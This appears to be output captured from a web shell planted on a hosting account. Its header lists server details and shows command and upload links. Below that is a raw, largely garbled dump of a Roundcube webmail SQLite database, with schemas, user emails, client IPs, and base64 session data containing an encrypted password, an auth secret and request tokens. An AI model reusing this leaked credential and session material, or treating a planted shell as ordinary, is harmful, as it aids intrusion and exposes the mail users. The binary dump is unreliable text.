Server IP : 184.107.3.203 / Your IP : 216.73.216.51 Web Server : Apache System : Linux dedicated2.avenfashion.com.ph 4.18.0-553.40.1.el8_10.x86_64 #1 SMP Mon Feb 10 12:11:18 EST 2025 x86_64 User : adminteladeoro ( 1015) PHP Version : 8.2.28 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/adminteladeoro/etc/teladeoro.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
SQLite format 3 @ ! z ] ~ ! ._� � l���������#��%��6 )= indexsqlite_autoindex_cache_1cacheA�-indexix_searches_user_type_namesearchesCREATE UNIQUE INDEX ix_searches_user_type_name ON searches (user_id, type, name)�c�tablesearchessearchesCREATE TABLE searches ( search_id integer NOT NULL PRIMARY KEY, user_id integer NOT NULL DEFAULT '0', "type" smallint NOT NULL DEFAULT '0', name varchar(128) NOT NULL, data text NOT NULL )�C!�3indexix_dictionary_user_languagedictionaryCREATE UNIQUE INDEX ix_dictionary_user_language ON dictionary (user_id, "language")�!!�{tabledictionarydictionaryCREATE TABLE dictionary ( user_id integer DEFAULT NULL, "language" varchar(5) NOT NULL, data text NOT NULL )Y1uindexix_session_changedsessionCREATE INDEX ix_session_changed ON session (changed)�V �tablesessionsessionCREATE TABLE session ( sess_id varchar(128) NOT NULL PRIMARY KEY, changed datetime NOT NULL default '0000-00-00 00:00:00', ip varchar(40) NOT NULL default '', vars text NOT NULL )-A indexsqlite_autoindex_session_1sessionf/�indexix_users_usernameusers CREATE UNIQUE INDEX ix_users_username ON users(username, mail_host)� �tableusersusersCREATE TABLE users ( user_id integer NOT NULL PRIMARY KEY, username varchar(128) NOT NULL default '', mail_host varchar(128) NOT NULL default '', created datetime NOT NULL default '0000-00-00 00:00:00', last_login datetime DEFAULT NULL, failed_login datetime DEFAULT NULL, failed_login_counter integer DEFAULT NULL, language varchar(5), preferences text NOT NULL default '' )d 3!�indexix_identities_emailidentitiesCREATE INDEX ix_identities_email ON identities(email, del)j 7!� indexix_identities_user_ididentities CREATE INDEX ix_identities_user_id ON identities(user_id, del)�>!!�Gtableidentitiesidentities CREATE TABLE identities ( identity_id integer NOT NULL PRIMARY KEY, user_id integer NOT NULL default '0', changed datetime NOT NULL default '0000-00-00 00:00:00', del tinyint NOT NULL default '0', standard tinyint NOT NULL default '0', name varchar(128) NOT NULL default '', organization varchar(128) default '', email varchar(128) NOT NULL default '', "reply-to" varchar(128) NOT NULL default '', bcc varchar(128) NOT NULL default '', signature text NOT NULL default '', html_signature tinyint NOT NULL default '0' )�O3�1indexix_contactgroupmembers_contact_idcontactgroupmembersCREATE INDEX ix_contactgroupmembers_contact_id ON contactgroupmembers (contact_id)� 33�AtablecontactgroupmemberscontactgroupmembersCREATE TABLE contactgroupmembers ( contactgroup_id integer NOT NULL, contact_id integer NOT NULL default '0', created datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (contactgroup_id, contact_id) )EY3 indexsqlite_autoindex_contactgroupmembers_1contactgroupmembers v='�indexix_contactgroups_user_idcontactgroupsCREATE INDEX ix_contactgroups_user_id ON contactgroups(user_id, del)�$''�tablecontactgroupscontactgroupsCREATE TABLE contactgroups ( contactgroup_id integer NOT NULL PRIMARY KEY, user_id integer NOT NULL default '0', changed datetime NOT NULL default '0000-00-00 00:00:00', del tinyint NOT NULL default '0', name varchar(128) NOT NULL default '' )b3�indexix_contacts_user_idcontactsCREATE INDEX ix_contacts_user_id ON contacts(user_id, del)�D�[tablecontactscontactsCREATE TABLE contacts ( contact_id integer NOT NULL PRIMARY KEY, user_id integer NOT NULL, changed datetime NOT NULL default '0000-00-00 00:00:00', del tinyint NOT NULL default '0', name varchar(128) NOT NULL default '', email text NOT NULL default '', firstname varchar(128) NOT NULL default '', surname varchar(128) NOT NULL default '', vcard text NOT N P� @�} =�` >�P � =�b q Y � / / �� . m����� �X11�tablecaldav_attachmentscaldav_attachments?CREATE TABLE caldav_attachments ( attachment_id integer NOT NULL PRIMARY KEY, event_id integer NOT NULL DEFAULT '0', filename varchar(255) NOT NULL DEFAULT '', mimetype varchar(255) NOT NULL DEFAULT '', size integer NOT NULL DEFAULT '0', data longtext NOT NULL, CONSTRAINT fk_caldav_attachments_event_id FOREIGN KEY (event_id) REFERENCES caldav_events(event_id) ) ��--�{tableical_attachmentsical_attachments6CREATE TABLE ical_attachments ( attachment_id integer NOT NULL PRIMARY KEY, event_id integer NOT NULL DEFAULT '0', filename varchar(255) NOT NULL DEFAULT '', mimetype varchar(255) NOT NULL DEFAULT '', size integer NOT NULL DEFAULT '0', data longtext NOT NULL, CONSTRAINT fk_ical_attachments_event_id FOREIGN KEY (event_id) REFERENCES ical_events(event_id) )�JZ�otableeventsevents*CREATE TABLE events ( event_id integer NOT NULL PRIMARY KEY, calendar_id integer NOT NULL default '0', recurrence_id integer NOT NULL default '0', uid varchar(255) NOT NULL default '', instance varchar(16) NOT NULL default '', isexception tinyint(1) NOT NULL default '0', created datetime NOT NULL default '1000-01-01 00:00:00', changed datetime NOT NULL default '1000-01-01 00:00:00', sequence integer NOT NULL default '0', start datetime NOT NULL default '1000-01-01 00:00:00', end datetime NOT NULL default '1000-01-01 00:00:00', recurrence varchar(255) default NULL, title varchar(255) NOT NULL, description text NOT NULL, location varchar(255) NOT NULL default '', categories varchar(255) NOT NULL default '', url varchar(255) NOT NULL default '', all_day tinyint(1) NOT NULL default '0', free_busy tinyint(1) NOT NULL default '0', priority tinyint(1) NOT NULL default '0', sensitivity tinyint(1) NOT NULL default '0', status varchar(32) NOT NULL default '', alarms text default NULL, attendees text default NULL, notifyat datetime default NULL, CONSTRAINT fk_events_calendar_id FOREIGN KEY (calendar_id) REFERENCES calendars(calendar_id) )�[##�itableattachmentsattachments+CREATE TABLE attachments ( attachment_id integer NOT NULL PRIMARY KEY, event_id integer NOT NULL default '0', filename varchar(255) NOT NULL default '', mimetype varchar(255) NOT NULL default '', size integer NOT NULL default '0', data text NOT NULL default '', CONSTRAINT fk_attachment_event_id FOREIGN KEY (event_id) REFERENCES events(event_id) )�\++�mtableitipinvitationsitipinvitations-CREATE TABLE itipinvitations ( token varchar(64) NOT NULL PRIMARY KEY, event_uid varchar(255) NOT NULL, user_id integer NOT NULL default '0', event text NOT NULL, expires datetime NOT NULL default '1000-01-01 00:00:00', cancelled tinyint(1) NOT NULL default '0', CONSTRAINT fk_itipinvitations_user_id FOREIGN KEY (user_id) REFERENCES users(user_id) )=]Q+ indexsqlite_autoindex_itipinvitations_1itipinvitations.|^9+�!indexix_itipinvitations_uiditipinvitations/CREATE INDEX ix_itipinvitations_uid ON itipinvitations(user_id, event_uid) ))�_tableical_calendarsical_calendars0CREATE TABLE ical_calendars ( calendar_id integer NOT NULL PRIMARY KEY, user_id integer NOT NULL DEFAULT '0', name varchar(255) NOT NULL, color varchar(8) NOT NULL, sze=#�!indexical_calendar_notify_idxical_events5CREATE INDEX ical_calendar_notify_idx ON ical_events(calendar_id,notifyat) �3#� indexical_recurrence_idxical_events4CREATE INDEX ical_recurrence_idx ON ical_events(recurrence_id) R%#gindexical_uid_idxical_events3CREATE INDEX ical_uid_idx ON ical_events(uid) � � Z � � 3 31 2024-06-29 08:24:37Supportsupport@imanila.ph [ � �� 2 3 1 2019-05-21 06:26:03test@teladeoro.com2 3 1 0000-00-00 00:00:00test@teladeoro.com Y % $ �? 133 �itest@teladeoro.comlocalhost2019-05-21 06:26:032022-03-19 04:26:06en_USa:3:{s:11:"client_hash";s:16:"jRLzzEHu3qc3sNVj";s:9:"junk_mbox";s:10:"INBOX.spam";s:15:"namespace_fixed";b:1;} % % $ �h 133 �;test@teladeoro.comlocalhost2019-05-21 06:26:032024-06-29 08:24:05en_USa:4:{s:12:"archive_mbox";s:13:"INBOX.Archive";s:11:"client_hash";s:16:"jRLzzEHu3qc3sNVj";s:9:"junk_mbox";s:10:"INBOX.spam";s:15:"namespace_fixed";b:1;} � � 1 test@teladeoro.comlocalhost � �� � O�� �M3#�=0880df74481de5234efea82a3a521c412019-05-21 06:28:26203.167.4.1bGFuZ3VhZ2V8czo1OiJlbl9VUyI7c2tpbnxzOjU6ImxhcnJ5IjtpbWFwX25hbWVzcGFjZXxhOjU6e3M6ODoicGVyc29uYWwiO2E6MTp7aTowO2E6Mjp7aTowO3M6NjoiSU5CT1guIjtpOjE7czoxOiIuIjt9fXM6NToib3RoZXIiO047czo2OiJzaGFyZWQiO047czo5OiJwcmVmaXhfaW4iO3M6NjoiSU5CT1guIjtzOjEwOiJwcmVmaXhfb3V0IjtzOjY6IklOQk9YLiI7fWltYXBfZGVsaW1pdGVyfHM6MToiLiI7dXNlcl9pZHxzOjE6IjEiO3VzZXJuYW1lfHM6MTg6InRlc3RAdGVsYWRlb3JvLmNvbSI7c3RvcmFnZV9ob3N0fHM6OToibG9jYWxob3N0IjtzdG9yYWdlX3BvcnR8aToxNDM7c3RvcmFnZV9zc2x8TjtwYXNzd29yZHxzOjk2OiJxZVBJcWZnTEMrK3JvdllWeHVydC9HTjJMQ3ZOcmxuZVZwVjllRkNCMUNFWDVzdFFobmhuaWVHcUNlWWp3Z1U5VXg2dzloWCtLQWF3ZHRpSUVwVHo1OUd4OGhtUkhlNFgiO2xvZ2luX3RpbWV8aToxNTU4NDE5OTYzO1NUT1JBR0VfU1BFQ0lBTC1VU0V8YjoxO2F1dGhfc2VjcmV0fHM6MzI6IldnVzhKRUxTWURoT0JBVkRHQ1pKVTV4NFdydjRFajYxIjtyZXF1ZXN0X3Rva2VufHM6MzI6IllId2RSSlI3RFdqem9RdU1wUE5FTnVSb2J3ckdvTlRmIjt0YXNrfHM6NDoibWFpbCI7aW1hcF9ob3N0fHM6OToibG9jYWxob3N0IjttYm94fHM6NToiSU5CT1giO3NvcnRfY29sfHM6MDoiIjtzb3J0X29yZGVyfHM6NDoiREVTQyI7U1RPUkFHRV9USFJFQUR8YTozOntpOjA7czoxMDoiUkVGRVJFTkNFUyI7aToxO3M6NDoiUkVGUyI7aToyO3M6MTQ6Ik9SREVSRURTVUJKRUNUIjt9U1RPUkFHRV9RVU9UQXxiOjE7U1RPUkFHRV9MSVNULUVYVEVOREVEfGI6MTtsaXN0X2F0dHJpYnxhOjY6e3M6NDoibmFtZSI7czo4OiJtZXNzYWdlcyI7czoyOiJpZCI7czoxMToibWVzc2FnZWxpc3QiO3M6NToiY2xhc3MiO3M6NDg6InJlY29yZHMtdGFibGUgbWVzc2FnZWxpc3Qgc29ydGhlYWRlciBmaXhlZGhlYWRlciI7czoxNToib3B0aW9uc21lbnVpY29uIjtzOjQ6InRydWUiO3M6MTU6ImFyaWEtbGFiZWxsZWRieSI7czoyMjoiYXJpYS1sYWJlbC1tZXNzYWdlbGlzdCI7czo3OiJjb2x1bW5zIjthOjg6e2k6MDtzOjc6InRocmVhZHMiO2k6MTtzOjc6InN1YmplY3QiO2k6MjtzOjY6InN0YXR1cyI7aTozO3M6NjoiZnJvbXRvIjtpOjQ7czo0OiJkYXRlIjtpOjU7czo0OiJzaXplIjtpOjY7czo0OiJmbGFnIjtpOjc7czoxMDoiYXR0YWNobWVudCI7fX1wYWdlfGk6MTt1bnNlZW5fY291bnR8YTo2OntzOjU6IklOQk9YIjtpOjM7czoxMjoiSU5CT1guRHJhZnRzIjtpOjA7czoxMDoiSU5CT1guU2VudCI7aTowO3M6MTA6IklOQk9YLnNwYW0iO2k6MDtzOjExOiJJTkJPWC5UcmFzaCI7aTowO3M6MTM6IklOQk9YLkFyY2hpdmUiO2k6MDt9U1RPUkFHRV9BQ0x8YjowO2xhc3RfY29tcG9zZV9zZXNzaW9ufHM6MjM6IjE1NjMyOTQ1Mjc1Y2UzOWEwNTg0NGExIjtmb2xkZXJzfGE6Njp7czo1OiJJTkJPWCI7YToyOntzOjM6ImNudCI7aTozO3M6NjoibWF4dWlkIjtpOjM7fXM6MTI6IklOQk9YLkRyYWZ0cyI7YToyOntzOjM6ImNudCI7aTowO3M6NjoibWF4dWlkIjtpOjA7fXM6MTA6IklOQk9YLlNlbnQiO2E6Mjp7czozOiJjbnQiO2k6MjtzOjY6Im1heHVpZCI7aToyO31zOjEwOiJJTkJPWC5zcGFtIjthOjI6e3M6MzoiY250IjtpOjA7czo2OiJtYXh1aWQiO2k6MDt9czoxMToiSU5CT1guVHJhc2giO2E6Mjp7czozOiJjbnQiO2k6MDtzOjY6Im1heHVpZCI7aTowO31zOjEzOiJJTkJPWC5BcmNoaXZlIjthOjI6e3M6MzoiY250IjtpOjA7czo2OiJtYXh1aWQiO2k6MDt9fQ==�hM3#�U19095079cf31a892128a4c21dff8e2022019-05-21 06:26:04203.167.4.1bGFuZ3VhZ2V8czo1OiJlbl9VUyI7c2tpbnxzOjU6ImxhcnJ5IjtpbWFwX25hbWVzcGFjZXxhOjU6e3M6ODoicGVyc29uYWwiO2E6MTp7aTowO2E6Mjp7aTowO3M6NjoiSU5CT1guIjtpOjE7czoxOiIuIjt9fXM6NToib3RoZXIiO047czo2OiJzaGFyZWQiO047czo5OiJwcmVmaXhfaW4iO3M6NjoiSU5CT1guIjtzOjEwOiJwcmVmaXhfb3V0IjtzOjY6IklOQk9YLiI7fWltYXBfZGVsaW1pdGVyfHM6MToiLiI7dXNlcl9pZHxzOjE6IjEiO3VzZXJuYW1lfHM6MTg6InRlc3RAdGVsYWRlb3JvLmNvbSI7c3RvcmFnZV9ob3N0fHM6OToibG9jYWxob3N0IjtzdG9yYWdlX3BvcnR8aToxNDM7c3RvcmFnZV9zc2x8TjtwYXNzd29yZHxzOjk2OiJxZVBJcWZnTEMrK3JvdllWeHVydC9HTjJMQ3ZOcmxuZVZwVjllRkNCMUNFWDVzdFFobmhuaWVHcUNlWWp3Z1U5VXg2dzloWCtLQWF3ZHRpSUVwVHo1OUd4OGhtUkhlNFgiO2xvZ2luX3RpbWV8aToxNTU4NDE5OTYzO1NUT1JBR0VfU1BFQ0lBTC1VU0 T F m �m�� $M178cae882700c7b6fb453bb515f85a96$M5039953351e204b2dcfd68560527b208$M0880df74481de5234efea82a3a521c41#M 19095079cf31a892128a4c21dff8e202 � � �c�r �� 8 �* =������������ o#�9tablesystemsystem&CREATE TABLE system ( name varchar(64) NOT NULL PRIMARY KEY, value text NOT NULL )+$? indexsqlite_autoindex_system_1system'�_%//�mtablecp_schema_versioncp_schema_version(CREATE TABLE `cp_schema_version` ( version_id integer NOT NULL PRIMARY KEY, version varchar(128) NOT NULL UNIQUE, applied datetime NOT NULL default '0000-00-00 00:00:00')A&U/ indexsqlite_autoindex_cp_schema_version_1cp_schema_version)�� � 7 � l � � � 9 � p �1 �Y�ytablecalendarscalendarsCREATE TABLE calendars ( calendar_id integer NOT NULL PRIMARY KEY, user_id integer NOT NULL default '0', name varchar(255) NOT NULL default '', color varchar(255) NOT NULL default '', showalarms tinyint(1) NOT NULL default '1', driver varchar(255) NOT NULL default 'database', CONSTRAINT fk_calendars_user_id FOREIGN KEY (user_id) REFERENCES users(user_id) )�VQ�tablesessionsessionCREATE TABLE session ( sess_id varchar(128) NOT NULL PRIMARY KEY, changed datetime NOT NULL default '0000-00-00 00:00:00', ip varchar(40) NOT NULL default '', vars text NOT NULL )-RA indexsqlite_autoindex_session_1session�[ + R �6V%%�/tablecache_sharedcache_sharedCREATE TABLE cache_shared ( cache_key varchar(255) NOT NULL, expires datetime DEFAULT NULL, data text NOT NULL, PRIMARY KEY (cache_key) )7WK% indexsqlite_autoindex_cache_shared_1cache_sharedmX;%�indexix_cache_shared_expirescache_sharedCREATE INDEX ix_cache_shared_expires ON cache_shared(expires) g�tablecalendarscalendarsCREATE TABLE calendars ( calendar_id integer NOT NULL PRIMARY KEY, user_id integer NOT NULL default '0', name varchar(255) NOT NULL default '', color varchar(255) NOT NULL default '', showalarms tinyint(1) NOT NULL default '1', CONSTRAINT fk_calendars_user_id FOREIGN KEY (user_id) REFERENCES users(user_id) ) � # � � { : ��###### w11�tablecaldav_attachmentscaldav_attachments?CREATE TABLE caldav_attachments ( attachment_id integer NOT NULL PRIMARY KEY, event_id integer NOT NULL DEFAULT '0', filename varchar(255) NOT NULL DEFAULT '', mimetype varchar(255) NOT NULL DEFAULT '', size integer NOT NULL DEFAULT '0', data longtext NOT NULL, CONSTRAINT fk_caldav_attachments_event_id FOREIGN KEY (event_id) REFERENCES caldav_events(event_id) ) �5-�indexcaldav_user_name_idxcaldav_calendars9CREATE INDEX caldav_user_name_idx ON caldav_calendars(user_id, name)�)h--�tablecaldav_calendarscaldav_calendars8CREATE TABLE caldav_calendars ( calendar_id integer NOT NULL PRI��11�Ktablecarddav_group_usercarddav_group_userQCREATE TABLE carddav_group_user ( group_id integer NOT NULL, contact_id integer NOT NULL, PRIMARY KEY(group_id,contact_id), -- not enforced by sqlite < 3.6.19 FOREIGN KEY(group_id) REFERENCES carddav_groups(id) ON DELETE CASCADE ON UPDATE CASCADE, FOREIGN KEY(contact_id) REFERENCES carddav_contacts(id) ON DELETE CASCADE ON UPDATE CASCADE )} A� U/ indexsqlite_autoindex_carddav_xsubtypes_1carddav_xsubtypesL�,//�tablecarddav_xsubtypescarddav_xsubtypesKCREATE TABLE carddav_xsubtypes ( id integer NOT NULL PRIMARY KEY, typename VARCHAR(128) NOT NULL, -- name of the type subtype VARCHAR(128) NOT NULL, -- name of the subtype abook_id integer NOT NULL, -- not enforced by sqlite < 3.6.19 FOREIGN KEY(abook_id) REFERENCES carddav_addressbooks(id) ON DELETE CASCADE ON UPDATE CASCADE, UNIQUE(typename,subtype,abook_id) )�~G-�indexcarddav_contacts_abook_id_idxcarddav_contactsJCREATE INDEX carddav_contacts_abook_id_idx ON carddav_contacts(abook_id)?}S- indexsqlite_autoindex_carddav_contacts_2carddav_contactsI?|S- indexsqlite_autoindex_carddav_contacts_1carddav_contactsH�>{--�/tablecarddav_contactscarddav_contactsGCREATE TABLE carddav_contacts ( id integer NOT NULL PRIMARY KEY, abook_id integer NOT NULL, name VARCHAR(255) NOT NULL, -- display name email VARCHAR(255), -- ", " separated list of mail addresses firstname VARCHAR(255), surname VARCHAR(255), organization VARCHAR(255), showas VARCHAR(32) NOT NULL DEFAULT '', -- special display type (e.g., as a company) vcard TEXT NOT NULL, -- complete vcard etag VARCHAR(255) NOT NULL, -- entity tag, can be used to check if card changed on server uri VARCHAR(255) NOT NULL, -- path of the card on the server cuid VARCHAR(255) NOT NULL, -- unique identifier of the card within the collection UNIQUE(uri,abook_id), UNIQUE(cuid,abook_id), -- not enforced by sqlite < 3.6.19 FOREIGN KEY(abook_id) REFERENCES carddav_addressbooks(id) ON DELETE CASCADE ON UPDATE CASCADE ) ( Yr1uindexix_session_changedsessionACREATE INDEX ix_session_changed ON session (changed) s �s�� J!&-!libkolab-version2023111200$,;!calendar-caldav-version2024082600&+?!calendar-database-version2024082600/!roundcube-version2022081200 � � ���� +roundcube-version/roundcube-version c-libkolab-version&;calendar-caldav-version,?calendar-database-version+ o ����jL-����o 31.6.0.72023-04-16 16:29:12 31.5.2.62023-03-06 16:26:55 31.5.2.52023-02-14 16:30:09 31.5.2.12022-12-02 16:27:08 31.4.122022-03-29 09:53:04 31.4.112021-11-03 18:53:00 31.4.102021-01-08 19:04:29 31.4.82020-10-02 19:07:17 31.4.72020-08-25 18:52:16 31.4.62020-07-08 19:00:15 31.4.42020-06-09 18:58:09 31.3.82020-05-12 19:11:28 31.3.72019-05-15 19:04:49 t ������������t 1.6.0.71.5.2.61.5.2.51.5.2.1 1.4.12 1.4.11 1.4.10 1.4.8 1.4.7 1.4.6 1.4.4 1.3.8 1.3.7 * * * X S S S N S M X D O O N M 6 G'�triggerUpdateLastTimeForCalDAVEventscaldav_eventsCREATE TRIGGER UpdateLastTimeForCalDAVEvents AFTER UPDATE ON caldav_events FOR EACH ROW BEGIN UPDATE caldav_events SET caldav_last_change = CURRENT_TIMESTAMP WHERE event_id = old.event_id; END�.q11�tablecaldav_attachmentscaldav_attachments?CREATE TABLE caldav_attachments ( attachment_id integer NOT NULL PRIMARY KEY, event_id integer NOT NULL DEFAULT '0', filename varchar(255) NOT NULL DEFAULT '', mimetype varchar(255) NOT NULL DEFAULT '', size integer NOT NULL DEFAULT '0', data longtext NOT NULL, CONSTRAINT fk_caldav_attachments_event_id FOREIGN KEY (event_id) REFERENCES caldav_events(event_id) )Yr1uindexix_session_changedsessionACREATE INDEX ix_session_changed ON session (changed)�`x11�ktablecarddav_migrationscarddav_migrationsDCREATE TABLE carddav_migrations ( ID integer NOT NULL PRIMARY KEY, filename VARCHAR(64) NOT NULL, processed_at TIME NOT NULL DEFAULT CURRENT_TIMESTAMP, UNIQUE(filename) )CyW1 indexsqlite_autoindex_carddav_migrations_1carddav_migrationsE�>{--�/tablecarddav_contactscarddav_contactsGCREATE TABLE carddav_contacts ( id integer NOT NULL PRIMARY KEY, abook_id integer NOT NULL, name VARCHAR(255) NOT NULL, -- display name email VARCHAR(255), -- ", " separated list of mail addresses firstname VARCHAR(255), surname VARCHAR(255), organization VARCHAR(255), showas VARCHAR(32) NOT NULL DEFAULT '', -- special display type (e.g., as a company) vcard TEXT NOT NULL, -- complete vcard etag VARCHAR(255) NOT NULL, -- entity tag, can be used to check if card changed on server uri VARCHAR(255) NOT NULL, -- path of the card on the server cuid VARCHAR(255) NOT NULL, -- unique identifier of the card within the collection UNIQUE(uri,abook_id), UNIQUE(cuid,abook_id), -- not enforced by sqlite < 3.6.19 FOREIGN KEY(abook_id) REFERENCES carddav_addressbooks(id) ON DELETE CASCADE ON UPDATE CASCADE )?|S- indexsqlite_autoindex_carddav_contacts_1carddav_contactsH?}S- indexsqlite_autoindex_carddav_contacts_2carddav_contactsI�~G-�indexcarddav_contacts_abook_id_idxcarddav_contactsJCREATE INDEX carddav_contacts_abook_id_idx ON carddav_contacts(abook_id)�,//�tablecarddav_xsubtypescarddav_xsubtypesKCREATE TABLE carddav_xsubtypes ( id integer NOT NULL PRIMARY KEY, typename VARCHAR(128) NOT NULL, -- name of the type subtype VARCHAR(128) NOT NULL, -- name of the subtype abook_id integer NOT NULL, -- not enforced by sqlite < 3.6.19 FOREIGN KEY(abook_id) REFERENCES carddav_addressbooks(id) ON DELETE CASCADE ON UPDATE CASCADE, UNIQUE(typename,subtype,abook_id) )A� U/ indexsqlite_autoindex_carddav_xsubtypes_1carddav_xsubtypesL��))�Qtablecarddav_groupscarddav_groupsMCREATE TABLE carddav_groups ( id integer NOT NULL PRIMARY KEY, abook_id integer NOT NULL, name VARCHAR(255) NOT NULL, -- display name vcard TEXT NOT NULL, -- complete vcard etag VARCHAR(255) NOT NULL, -- entity tag, can be used to check if card changed on server uri VARCHAR(255) NOT NULL, -- path of the card on the server cuid VARCHAR(255) NOT NULL, -- unique identifier of the card within the collection UNIQUE(uri,abook_id), UNIQUE(cuid,abook_id), -- not enforced by sqlite < 3.6.19 FOREIGN KEY(abook_id) REFERENCES carddav_addressbooks(id) ON DELETE CASCADE ON UPDATE CASCADE );�O) indexsqlite_autoindex_carddav_groups_1carddav_groupsN;�O) indexsqlite_autoindex_carddav_groups_2carddav_groupsO��11�Ktablecarddav_group_usercarddav_group_userQCREATE TABLE carddav_group_user ( group_id integer NOT NULL, contact_id integer NOT NULL, PRIMARY KEY(group_id,contact_id), -- not enforced by sqlite < 3.6.19 FOREIGN KEY(group_id) REFERENCES carddav_groups(id) ON DELETE CASCADE ON UPDATE CASCADE, FOREIGN KEY(contact_id) REFERENCES carddav_contacts(id) ON DELETE CASCADE ON UPDATE CASCADE ) � ���Z$���X. � � � a !��� 4 G30016-increasetextfieldlengths2024-06-29 08:24:06/ =30015-fixmysqlconstraints2024-06-29 08:24:066 K30014-unifytimestampdefaultvalue2024-06-29 08:24:06> [30013-changemysqlcollationscasesensitive2024-06-29 08:24:06/ =30012-fixmysqlconstraints2024-06-29 08:24:063 E30011-unifymigrationsidcolumn2024-06-29 08:24:064 G30010-increasetextfieldlengths2024-06-29 08:24:06/ =30009-dropauthschemefield2024-06-29 08:24:05( /30008-unifyindexes2024-06-29 08:24:052 C30007-replaceurlplaceholders2024-06-29 08:24:05+ 530006-rmgroupsnotnull2024-06-29 08:24:053 E30005-changemysqlut8toutf8mb42022-03-19 04:26:064 G30004-fixtimestampdefaultvalue2022-03-19 04:26:064 G30003-fixtimestampdefaultvalue2022-03-19 04:26:064 G30002-increasetextfieldlengths2022-03-19 04:26:06& +30001-categories2022-03-19 04:26:06" #30000-sample2022-03-19 04:26:06" #30000-dbinit2022-03-19 04:26:06 � �����gF- ����zN* � !G0016-increasetextfieldlengths=0015-fixmysqlconstraints#K0014-unifytimestampdefaultvalue+[0013-changemysqlcollationscasesensitive=0012-fixmysqlconstraints E0011-unifymigrationsidcolumn !G0010-increasetextfieldlengths=0009-dropauthschemefield/0008-unifyindexes C0007-replaceurlplaceholders 50006-rmgroupsnotnull E0005-changemysqlut8toutf8mb4!G0004-fixtimestampdefaultvalue!G0003-fixtimestampdefaultvalue!G0002-increasetextfieldlengths+0001-categories#0000-sample# 0000-dbinit F l� � 1�m��d � 7�l4�� � F �9#�indexix_cache_index_expirescache_indexCREATE INDEX ix_cache_index_expires ON cache_index (expires)5�aI# indexsqlite_autoindex_cache_index_1cache_index�N�`##�ctablecache_indexcache_indexCREATE TABLE cache_index ( user_id integer NOT NULL REFERENCES users (user_id) ON DELETE CASCADE ON UPDATE CASCADE, mailbox varchar(255) NOT NULL, expires datetime DEFAULT NULL, valid smallint NOT NULL DEFAULT '0', data text NOT NULL, PRIMARY KEY (user_id, mailbox) )�u�R!!�5tableidentitiesidentitiesCREATE TABLE identities ( identity_id integer NOT NULL PRIMARY KEY, user_id integer NOT NULL REFERENCES users (user_id) ON DELETE CASCADE ON UPDATE CASCADE, changed datetime NOT NULL default '0000-00-00 00:00:00', del tinyint NOT NULL default '0', standard tinyint NOT NULL default '0', name varchar(128) NOT NULL default '', organization varchar(128) default '', email varchar(128) NOT NULL default '', "reply-to" varchar(128) NOT NULL default '', bcc varchar(128) NOT NULL default '', signature text NOT NULL default '', html_signature tinyint NOT NULL default '0' ))�^= indexsqlite_autoindex_cache_1cache_�ZA�-indexix_searches_user_type_namesearchesCREATE UNIQUE INDEX ix_searches_user_type_name ON searches (user_id, type, name)��XC!�/indexix_dictionary_user_languagedictionaryWCREATE UNIQUE INDEX ix_dictionary_user_language ON dictionary (user_id, language)�U�W!!�utabledictionarydictionary CREATE TABLE dictionary ( user_id integer DEFAULT NULL REFERENCES users (user_id) ON DELETE CASCADE ON UPDATE CASCADE, language varchar(16) NOT NULL, data text NOT NULL ) i5�indexix_responses_user_idresponsesXCREATE INDEX ix_responses_user_id ON responses(user_id, del)�~�U�KtableresponsesresponsesCREATE TABLE responses ( response_id integer NOT NULL PRIMARY KEY, user_id integer NOT NULL REFERENCES users (user_id) ON DELETE CASCADE ON UPDATE CASCADE, changed datetime NOT NULL default '0000-00-00 00:00:00', del tinyint NOT NULL default '0', name varchar(255) NOT NULL, data text NOT NULL, is_html tinyint NOT NULL default '0' )d�T3!�indexix_identities_emailidentitiesUCREATE INDEX ix_identities_email ON identities(email, del)j�S7!� indexix_identities_user_ididentities CREATE INDEX ix_identities_user_id ON identities(user_id, del) I3�j���QI3�Oindexix_collected_addresses_user_idcollected_addressesVCREATE UNIQUE INDEX ix_collected_addresses_user_id ON collected_addresses(user_id, "type", email)P�_-kindexix_cache_expirescacheCREATE INDEX ix_cache_expires ON cache(expires)��]�tablecachecacheCREATE TABLE cache ( user_id integer NOT NULL REFERENCES users (user_id) ON DELETE CASCADE ON UPDATE CASCADE, cache_key varchar(128) NOT NULL default '', expires datetime DEFAULT NULL, data text NOT NULL, PRIMARY KEY (user_id, cache_key) ){�\5�/indexix_filestore_user_idfilestoreCCREATE UNIQUE INDEX ix_filestore_user_id ON filestore(user_id, context, filename)�A�[�QtablefilestorefilestoreCREATE TABLE filestore ( file_id integer NOT NULL PRIMARY KEY, user_id integer NOT NULL REFERENCES users (user_id) ON DELETE CASCADE ON UPDATE CASCADE, context varchar(32) NOT NULL, filename varchar(128) NOT NULL, mtime integer NOT NULL, data text NOT NULL )��Y�tablesearchessearchesCREATE TABLE searches ( search_id integer NOT NULL PRIMARY KEY, user_id integer NOT NULL REFERENCES users (user_id) ON DELETE CASCADE ON UPDATE CASCADE, "type" smallint NOT NULL DEFAULT '0', name varchar(128) NOT NULL, data text NOT NULL ) � c � ��=�e�|�cc �uuu �I3�Oindexix_collected_addresses_user_idcollected_addressesVCREATE UNIQUE INDEX ix_collected_addresses_user_id ON collected_addresses(user_id, "type", email)�~�P33�#tablecollected_addressescollected_addressesCREATE TABLE collected_addresses ( address_id integer NOT NULL PRIMARY KEY, user_id integer NOT NULL REFERENCES users (user_id) ON DELETE CASCADE ON UPDATE CASCADE, changed datetime NOT NULL default '0000-00-00 00:00:00', name varchar(255) NOT NULL default '', email varchar(255) NOT NULL, "type" integer NOT NULL )��OO3�1indexix_contactgroupmembers_contact_idcontactgroupmembers\CREATE INDEX ix_contactgroupmembers_contact_id ON contactgroupmembers (contact_id)E�NY3 indexsqlite_autoindex_contactgroupmembers_1contactgroupmembers��M33�atablecontactgroupmemberscontactgroupmembers[CREATE TABLE contactgroupmembers ( contactgroup_id integer NOT NULL REFERENCES contactgroups (contactgroup_id) ON DELETE CASCADE ON UPDATE CASCADE, contact_id integer NOT NULL REFERENCES contacts (contact_id) ON DELETE CASCADE ON UPDATE CASCADE, created datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (contactgroup_id, contact_id) )v�L='�indexix_contactgroups_user_idcontactgroupsCREATE INDEX ix_contactgroups_user_id ON contactgroups(user_id, del)�[�K''�utablecontactgroupscontactgroupsZCREATE TABLE contactgroups ( contactgroup_id integer NOT 